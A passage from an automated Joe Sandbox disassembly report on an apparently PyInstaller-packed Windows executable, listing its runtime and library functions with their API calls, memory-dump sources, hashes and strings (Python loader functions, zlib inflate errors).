                                                                                                                                                                                                                                                                                Function 00007FF73339C3DC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF73339C3F0
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF73339CE18: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF73339CE20
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF73339CE18: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF73339CE25
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1208906642-0
                                                                                                                                                                                                                                                                                • Opcode ID: ececd82fc3177ae58a022cdb863293519d79894eaec9217f5cc72d6a823b184f
                                                                                                                                                                                                                                                                                • Instruction ID: 796de4567c1a135bcc0794e6b5a9386df770a026117a1a3ca6fa48782662d83f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ececd82fc3177ae58a022cdb863293519d79894eaec9217f5cc72d6a823b184f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E09920E1D242E2FEF9366114923BAC6401F2A344EC0847CE99EB31C39E7E24963272
                                                                                                                                                                                                                                                                                Function 00007FF7333A9174 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: ca4321753697ca9e26add91f4c87d6fa1af88743aafd66e8485bee4c71de2195
                                                                                                                                                                                                                                                                                • Instruction ID: a8711630f1f494b8b5ef4362e2adb3dc1a99882e78f96b62a3ffb3ee929d9da3
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca4321753697ca9e26add91f4c87d6fa1af88743aafd66e8485bee4c71de2195
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7E04661B0820B66F7B53AA445865B8A0608F28301FD08038DA3C362C2DD3EA8453232
                                                                                                                                                                                                                                                                                Function 00007FF7333AFE04 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF7333AC22A,?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392), ref: 00007FF7333AFE59
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                • Opcode ID: e5baedaef9e1aefb999d7e678a491e2cb8f7af630fb86e3f47b81283e20e243b
                                                                                                                                                                                                                                                                                • Instruction ID: 96155ba1d77494d4ee75cbc6a116a7cc14dd4277c0e7e006d57390e4572be104
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5baedaef9e1aefb999d7e678a491e2cb8f7af630fb86e3f47b81283e20e243b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6F0AF01B19207A5FEF47A519D107B4E2904F48B40F88C238C91DAA3A2EE3CE5806230
                                                                                                                                                                                                                                                                                Function 00007FF7333AE6C4 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF7333A0268,?,?,?,00007FF7333A18D2,?,?,?,?,?,00007FF7333A4595), ref: 00007FF7333AE702
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                • Opcode ID: c4f21c11c5720e62b677d9e99b1ce174dfbed18f849e52640c9a6f6ea7657029
                                                                                                                                                                                                                                                                                • Instruction ID: eb237a211b7501945876d854acf0949b0ba12728b6473e4c48d08ae8d3d898d7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4f21c11c5720e62b677d9e99b1ce174dfbed18f849e52640c9a6f6ea7657029
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF08211F1E24261FEF87AA15900275E1905F44772FC8C63CED3EA52E1DE3DE480A230

                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                Function 00007FF733394C40 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394C50
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394C62
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394C99
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394CAB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394CC4
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394CD6
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394CEF
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D01
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D1D
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D2F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D4B
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D5D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D79
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D8B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394DA7
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394DB9
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394DD5
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394DE7
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                                • Opcode ID: 91fe38e706475bc85e8e17d1603b2dd44d209342b91b11e5c33006422c226cfa
                                                                                                                                                                                                                                                                                • Instruction ID: 6c79aa3bbfa05a2952994196b9e47210c65967834f92edfc8d317ae49d8e912e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91fe38e706475bc85e8e17d1603b2dd44d209342b91b11e5c33006422c226cfa
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF228F6590EB07B5FAF9FF64B854274B3A0AF48741BC4D43DD40E26264EF3CA589A321
                                                                                                                                                                                                                                                                                Function 00007FF7333B531C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                                • Opcode ID: d700f69ad9a83803b0d0e637264b1b7e22121a30603610bb88393cfb8a3bc4ed
                                                                                                                                                                                                                                                                                • Instruction ID: f6efa11b47359d0b46be34a9f2c1045d6c3f9b5e69fd6be887d5022f71649f8c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d700f69ad9a83803b0d0e637264b1b7e22121a30603610bb88393cfb8a3bc4ed
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCB2D172B182829BFBB59F64D4407FDB7A1FB44388F909139DA0D67A85DB3CA900DB50
                                                                                                                                                                                                                                                                                Function 00007FF73339A26D Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                                                • API String ID: 0-2665694366
                                                                                                                                                                                                                                                                                • Opcode ID: 4827148dd37d06b9a23a2cb7d22b3f776e5342dd5831b168843cb21776e0705c
                                                                                                                                                                                                                                                                                • Instruction ID: 7085f3a777d065f302013a7bf7274cd0053d6dd3711fface1b8d9e97cfbc21e8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4827148dd37d06b9a23a2cb7d22b3f776e5342dd5831b168843cb21776e0705c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1152F672A186A6DBE7A49F14C458B7EBBA9FB44340F41823DE64E97780DB3CD844DB10
                                                                                                                                                                                                                                                                                Function 00007FF73339C6FC Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                                                • Opcode ID: 89357c2c4ffda8ae13225540be7c458f51fcd4783b393db7419e501aec0a0031
                                                                                                                                                                                                                                                                                • Instruction ID: caebfb3ad1ab7b870a0829aa58da630f675db7dd1361462ded347eabe7d5d516
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89357c2c4ffda8ae13225540be7c458f51fcd4783b393db7419e501aec0a0031
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15315E72608B819AEBB4AF60E8403FDB364FB84744F84803ADA4D57B95DF38D648D720
                                                                                                                                                                                                                                                                                Function 00007FF7333AB558 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                                • Opcode ID: 2c2a6f2487acec397f330098253e2a7329acffa396285c7b3dfee245a17751bc
                                                                                                                                                                                                                                                                                • Instruction ID: 75479760e7bad4d2a91b9d7d4d14332fba4efd15ba44c3333338188d3805d1bc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c2a6f2487acec397f330098253e2a7329acffa396285c7b3dfee245a17751bc
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A316032618B8196DBB4DF25E8403AEB3A4FB88754F94413AEA9D53B99DF3CC145CB10
                                                                                                                                                                                                                                                                                Function 00007FF7333B2AE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                                                • Opcode ID: ccac9e585c27fa031d1f88e05c20b38684cf4203d2ca8c6846fc05bcbc68a6e8
                                                                                                                                                                                                                                                                                • Instruction ID: 72552906760bb9d76a5e312e0d22e1d576a198d1dc533ca0be6baf8527d5d434
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccac9e585c27fa031d1f88e05c20b38684cf4203d2ca8c6846fc05bcbc68a6e8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05B1C722B1C69651EEB0FB22D8102B9F350EB44BD4F848239EE5D67B95DE3CE441E360
                                                                                                                                                                                                                                                                                Function 00007FF73339C5E0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                • Opcode ID: d5122b7aff0e10d146bffe79506b726acaac58846df22bdc99709fd59aa8d240
                                                                                                                                                                                                                                                                                • Instruction ID: 86348365c936affcf562709eb01cfa4f5495cf7bfeb2ab2281fbbe5d7dbfd72a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5122b7aff0e10d146bffe79506b726acaac58846df22bdc99709fd59aa8d240
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6118E22B14F01AAEB90EF70E8542B873A4FB19B58F844E39DA6D977A4DF3CD1548350
                                                                                                                                                                                                                                                                                Function 00007FF7333B4E80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                                • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
